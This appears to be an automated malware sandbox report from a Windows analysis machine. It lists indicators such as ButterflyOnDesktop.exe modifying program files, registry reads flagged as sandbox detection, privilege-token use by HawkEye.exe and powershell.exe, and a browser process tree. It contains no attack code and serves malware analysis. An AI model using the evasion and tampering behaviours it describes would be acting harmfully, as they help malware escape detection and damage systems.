ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-unplated_contrast-white.png ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif ButterflyOnDesktop.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\StoreLogo.scale-125_contrast-black.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-125_contrast-black.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Glasses.png ButterflyOnDesktop.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-32.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailMediumTile.scale-200.png ButterflyOnDesktop.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-100.png ButterflyOnDesktop.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2160 648 WerFault.exe 166 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 18 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1859779917-101786662-3680946609-1000\{69060BEB-0081-48B3-B508-134F3A2BF73E} msedge.exe -
Suspicious behavior: AddClipboardFormatListener 4 IoCs
pid Process 772 WINWORD.EXE 772 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1176 msedge.exe 1176 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 4588 identity_helper.exe 4588 identity_helper.exe 4812 msedge.exe 4812 msedge.exe 4812 msedge.exe 4812 msedge.exe 3900 msedge.exe 3900 msedge.exe 2700 msedge.exe 2700 msedge.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2848 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 38 IoCs
pid Process 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2388 msedge.exe 2388 msedge.exe 2388 msedge.exe 4600 msedge.exe 4600 msedge.exe 4600 msedge.exe 4600 msedge.exe 4600 msedge.exe 4600 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeRestorePrivilege 3400 7zG.exe Token: 35 3400 7zG.exe Token: SeSecurityPrivilege 3400 7zG.exe Token: SeSecurityPrivilege 3400 7zG.exe Token: SeDebugPrivilege 2848 taskmgr.exe Token: SeSystemProfilePrivilege 2848 taskmgr.exe Token: SeCreateGlobalPrivilege 2848 taskmgr.exe Token: SeDebugPrivilege 4180 powershell.exe Token: 33 2848 taskmgr.exe Token: SeIncBasePriorityPrivilege 2848 taskmgr.exe Token: SeDebugPrivilege 4744 HawkEye.exe Token: SeDebugPrivilege 4736 taskmgr.exe Token: SeSystemProfilePrivilege 4736 taskmgr.exe Token: SeCreateGlobalPrivilege 4736 taskmgr.exe Token: 33 4736 taskmgr.exe Token: SeIncBasePriorityPrivilege 4736 taskmgr.exe Token: SeDebugPrivilege 3892 taskmgr.exe Token: SeSystemProfilePrivilege 3892 taskmgr.exe Token: SeCreateGlobalPrivilege 3892 taskmgr.exe Token: 33 3892 taskmgr.exe Token: SeIncBasePriorityPrivilege 3892 taskmgr.exe Token: SeDebugPrivilege 684 taskmgr.exe Token: SeSystemProfilePrivilege 684 taskmgr.exe Token: SeCreateGlobalPrivilege 684 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2676 msedge.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe 2848 taskmgr.exe -
Suspicious use of SetWindowsHookEx 22 IoCs
pid Process 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 772 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2676 wrote to memory of 3432 2676 msedge.exe 100 PID 2676 wrote to memory of 3432 2676 msedge.exe 100 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 4784 2676 msedge.exe 101 PID 2676 wrote to memory of 1176 2676 msedge.exe 102 PID 2676 wrote to memory of 1176 2676 msedge.exe 102 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103 PID 2676 wrote to memory of 2912 2676 msedge.exe 103
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Captura de pantalla 2023-03-05 184332.png"1⤵PID:1956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe56dd46f8,0x7ffe56dd4708,0x7ffe56dd47182⤵PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:22⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2976 /prefetch:82⤵PID:2912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:12⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:4892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:12⤵PID:4824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:12⤵PID:4188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:82⤵PID:648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:12⤵PID:2200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:12⤵PID:1816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:12⤵PID:1600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:12⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵PID:2268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:12⤵PID:4088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:12⤵PID:1128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:12⤵PID:436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6108 /prefetch:82⤵PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:12⤵PID:4780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5204 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
